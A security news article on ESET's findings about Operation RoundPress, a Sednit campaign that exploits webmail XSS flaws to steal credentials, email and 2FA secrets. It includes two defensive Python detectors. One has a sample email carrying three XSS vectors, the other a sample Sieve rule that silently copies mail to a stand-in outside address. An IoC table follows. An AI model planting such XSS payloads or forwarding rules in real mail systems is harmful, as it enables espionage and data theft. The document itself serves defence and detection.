Russian Hackers Exploit XSS Vulnerabilities to Inject Malicious Code into Email Servers
A sophisticated cyberespionage campaign, dubbed Operation RoundPress, has been uncovered by cybersecurity researchers at ESET.
Attributed with medium confidence to the Russia-aligned Sednit group (also tracked as APT28, Fancy Bear, and Forest Blizzard), the operation targets high-value webmail servers through cross-site scripting (XSS) vulnerabilities.
Sednit has been active since at least 2004 and has a long history that includes alleged involvement in the 2016 Democratic National Committee hack.
The group's latest campaign focuses on governmental and defense entities worldwide: spearphishing emails deliver malicious JavaScript payloads that execute inside the victim's webmail interface and steal sensitive data from there.
Sednit Group Targets Global Entities
Operation RoundPress initially targeted Roundcube webmail in 2023, exploiting known vulnerabilities like CVE-2020-35730.

By 2024 the campaign had expanded to other platforms, including Horde, MDaemon, and Zimbra, exploiting both flaws for which patches already existed and a zero-day.
The zero-day was an XSS vulnerability in MDaemon, CVE-2024-11182, which ESET reported to the developers on November 1, 2024; it was patched in version 24.5.1.
According to ESET's report, the attacks primarily target Eastern European entities connected to the war in Ukraine, including Ukrainian military entities and defense firms in Bulgaria and Romania, as well as governments in Africa, Europe, and South America.
The spearphishing emails are disguised as legitimate news updates, with convincing subject lines that get past spam filters and lure victims into opening them. Merely opening such a message in a vulnerable webmail client triggers the XSS flaw: the attacker's script runs in the webmail's origin, with the victim's authenticated session, and no further click is needed.
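The check a mail gateway, or the webmail server itself, should apply to incoming HTML before a vulnerable client renders it, as an added example that is not part of ESET's report or any vendor's code. It parses an RFC 822 message with Python's standard library, walks every text/html part and reports the constructs an XSS payload in email relies on: script and other active elements, on* event-handler attributes, javascript: URLs (entity-decoded, whitespace-padded variants included) and CSS expression()/url(javascript:) values. The sample message, addresses and subject are constructed for this example.

```python
"""Flag active HTML content in an email before a webmail client renders it (added example)."""
import email
from email import policy
from html.parser import HTMLParser

# Elements that execute or load code, or change where links and forms go.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "meta", "base"}
# Attributes whose value is a URL and may therefore carry a javascript: scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data", "background"}


class ActiveContentFinder(HTMLParser):
    """Collects every tag/attribute in an HTML body that could execute script."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag in ACTIVE_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            name = name.lower()
            # HTMLParser has already decoded entities such as &#106;avascript:,
            # so only whitespace/newline padding and case remain to normalise.
            value = "".join((value or "").split()).lower()
            if name.startswith("on"):
                self.findings.append(f"event:{tag}@{name}")
            elif name in URL_ATTRS and value.startswith("javascript:"):
                self.findings.append(f"jsurl:{tag}@{name}")
            elif name == "style" and ("expression(" in value or "url(javascript:" in value):
                self.findings.append(f"style:{tag}")


def scan_message(raw: bytes) -> dict:
    """Return the subject, all findings across text/html parts, and a block verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        finder = ActiveContentFinder()
        finder.feed(part.get_content())  # get_content() decodes transfer encoding and charset
        finder.close()
        findings.extend(finder.findings)
    return {"subject": str(msg["subject"]), "findings": findings, "block": bool(findings)}


# Constructed sample: a "news digest" lure carrying three separate XSS vectors.
SAMPLE_EML = b"""From: news@example.invalid
To: analyst@example.invalid
Subject: Weekly news digest
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Read the latest headlines.

--b1
Content-Type: text/html; charset=utf-8

<html><body>
<p>Read the latest headlines.</p>
<img src="x" onerror="alert(1)">
<a href="  JavaScript:void(0)">more</a>
<script>alert(2)</script>
</body></html>

--b1--
"""

if __name__ == "__main__":
    print(scan_message(SAMPLE_EML))
```

The scanner is deliberately a blocklist of active constructs rather than an allowlist sanitizer; on a real deployment it belongs in front of, not instead of, a proper HTML sanitizer in the webmail application, because the XSS bugs in this campaign were parsing flaws in the webmail's own sanitizer.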
Expanding Attack Vectors
The technical core of Operation RoundPress is a family of tailored JavaScript payloads, named SpyPress, with a variant for each webmail platform: SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA.

The payloads are heavily obfuscated, with randomized variable names and encrypted strings, and steal credentials by injecting hidden login forms into the page that trick the browser and password managers into auto-filling the stored username and password, which the script then reads out.
Beyond credential theft, the scripts exfiltrate email messages and contacts, and the MDaemon variant defeats two-factor authentication (2FA) by stealing the 2FA secret or creating an application password that grants access without a second factor.
SpyPress.ROUNDCUBE can also create Sieve rules that forward incoming mail to attacker-controlled addresses, so data keeps flowing even after the malicious email is no longer opened.
Stolen data is sent by HTTP POST requests to hardcoded command-and-control (C&C) servers, base64-encoded to obscure it in transit (base64 is an encoding, not encryption, so the exfiltrated content is readable to anyone inspecting the traffic).
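A hunt for the kind of forwarding rule described above, as an added example that is not part of ESET's report or any vendor's code. It takes the text of a user's Sieve script (Dovecot and other servers store one per user; the location and the sample scripts are assumptions for this example) and reports every redirect action whose target is outside an allowed set of domains, with the line it sits on and whether it uses :copy, which keeps the original in the mailbox so the user sees nothing missing. The regular expression covers the ordinary redirect "addr"; and redirect :copy "addr"; forms; an unusual script would need a real Sieve parser.

```python
"""Report Sieve redirect rules that send mail outside the organisation (added example)."""
import re

# redirect "addr";   or   redirect :copy "addr";   (any :tag words are optional)
REDIRECT_RE = re.compile(
    r'\bredirect\b(?P<tags>(?:\s+:\w+)*)\s+"(?P<addr>[^"]+)"\s*;',
    re.IGNORECASE,
)


def _strip_comments(script: str) -> str:
    # Replace /* ... */ blocks with the same number of newlines so that the
    # line numbers reported later still refer to the original script.
    script = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), script, flags=re.S)
    # '#' comments run to end of line; the newline itself is kept.
    # (A '#' inside a quoted string would also be stripped; acceptable for a hunt.)
    return re.sub(r"#[^\n]*", "", script)


def find_external_redirects(script: str, internal_domains) -> list:
    """Return one dict per redirect whose target domain is not in internal_domains."""
    internal = {d.lower() for d in internal_domains}
    cleaned = _strip_comments(script)
    hits = []
    for m in REDIRECT_RE.finditer(cleaned):
        addr = m.group("addr").strip()
        domain = addr.rsplit("@", 1)[1].lower() if "@" in addr else ""
        if domain in internal:
            continue  # forwarding inside the organisation is normal
        hits.append({
            "address": addr,
            # :copy keeps the original, so the victim never notices missing mail
            "copy": ":copy" in m.group("tags").lower(),
            "line": cleaned.count("\n", 0, m.start()) + 1,
        })
    return hits


def audit(scripts: dict, internal_domains) -> dict:
    """scripts maps a mailbox name to its Sieve text; returns only mailboxes with findings."""
    return {user: hits for user, script in scripts.items()
            if (hits := find_external_redirects(script, internal_domains))}


# Constructed sample: a benign internal forward plus a silent external copy rule.
SAMPLE_SIEVE = """# managesieve script (constructed sample)
require ["fileinto", "copy"];

if header :contains "subject" "invoice" {
    fileinto "Finance";
}

# legitimate internal forward
if address :is "to" "helpdesk@example.org" {
    redirect "support@example.org";
}

if true {
    redirect :copy "collector@mail-collector.invalid";
    keep;
}
"""

if __name__ == "__main__":
    for user, hits in audit({"alice": SAMPLE_SIEVE, "bob": "keep;\n"}, ["example.org"]).items():
        for h in hits:
            print(f"{user}: line {h['line']} redirects to {h['address']} (copy={h['copy']})")
```

Run it over every stored Sieve script on the server rather than over rules visible in the webmail UI: a rule created through the API by an injected script is just as effective whether or not the interface lists it, and the script on disk is the ground truth.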
The compromise chain is short: Sednit sends a spearphishing email carrying the XSS exploit, and the exploit fires when the message is opened in a vulnerable webmail client.
These emails often mimic legitimate communications, referencing current events or local news to enhance their credibility.
The payloads have no traditional persistence mechanism: the script simply runs again each time the email is reopened, and features such as the Sieve forwarding rules keep the attacker's access to the victim's data alive between runs.
The operation's global reach and its focus on defense and governmental sectors underscore its strategic intent, likely tied to geopolitical objectives.
Organizations should apply webmail patches promptly (most of the flaws exploited here already had fixes available when they were used) and strengthen email filtering so that active HTML content never reaches a vulnerable client, because vulnerabilities in public-facing applications remain a prime vector for espionage groups such as Sednit.
Indicators of Compromise (IoCs)
| Type | Value | Details | First seen |
|---|---|---|---|
| IP | 185.225.69[.]223 | SpyPress C&C server (sqj[.]fr) | 2024-06-01 |
| IP | 193.29.104[.]152 | SpyPress C&C server (tgh24[.]xyz) | 2024-06-04 |
| IP | 45.137.222[.]24 | SpyPress C&C server (lsjb[.]digital) | 2024-07-03 |
| SHA-1 | 41FE2EFB38E0C7DD10E6009A68BD26687D6DBF4C | JS/Agent.RSO (SpyPress.ZIMBRA) | N/A |
| SHA-1 | 8EBBBC9EB54E216EFFB437A28B9F2C7C9DA3A0FA | HTML/Phishing.Agent.GNZ (CVE-2024-11182 exploit) | N/A |